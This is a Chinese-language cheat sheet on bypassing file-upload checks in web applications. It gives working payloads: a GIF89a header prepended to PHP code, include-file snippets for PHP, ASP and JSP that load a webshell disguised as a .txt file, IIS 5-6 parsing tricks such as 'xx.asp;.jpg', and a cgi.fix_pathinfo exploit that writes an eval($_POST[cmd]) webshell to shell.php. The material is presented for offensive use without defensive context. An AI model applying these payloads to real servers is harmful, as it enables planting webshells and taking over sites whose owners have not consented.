文件上传校验方式
客户端JavaScript校验
服务端校验
①请求头中content-type字段校验
②文件内容头校验
③后缀黑名单
④后缀白名单
⑤自定义正则校验
WAF设备校验
前端绕过
校验只存在于网页的js,抓包修改即可绕过;如果还未发送数据就提示文件格式错误,就是前端判断
文件类型绕过
抓包修改,如将content-type字段改为image/gif
文件头绕过
在文件开头加入gif文件头
GIF89a<?php phpinfo(); ?>
配合文件包含绕过
在能够上传php文件,但是上传不了一句话木马的时候,说明服务端对文件内容做检测,可先上传一个文件包含函数的php文件,再包含木马txt文件
PHP
<?php Include("上传的txt文件路径");?>
ASP
<! --#include file="上传的txt文件路径" -->
JSP
<jsp:inclde page="上传的txt文件路径"/>
or
<%@include file="上传的txt文件路径"%>
服务器解析漏洞绕过 iis5-6
使用iis5.x-6.x版本的服务器,大多为windows server2003,网站比较古老,开发语句一般为asp
该解析漏洞也只能解析asp文件,而不能解析aspx和php文件
1、文件解析
上传文件名为xx.asp;.jpg会被解析为xx.asp
2、目录解析
iis5-6默认会把.asp,.asa目录下的文件都解析成asp文件
www.xxx.com/xx.asp/xx.jpg
www.xxx.com/xx.asa/xx.jpg
3、适用解析漏洞的文件类型
/test.asa
/test.cer
/test.cdx
服务器解析漏洞绕过iis7.5 nginx
适用环境:php开启了cgi.fix_pathinfo,而不是nginx或者iis7.5本身的漏洞,只能用于php文件
利用方式:
上传名字为test.jpg的文件,内容如下(任意其他后缀也行)
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
然后访问以下任意url
test.jpg/.php
test.jpg%00.php
test.jpg/%20\0.php
最终在test.jpg同级目录下生成一个shell.php
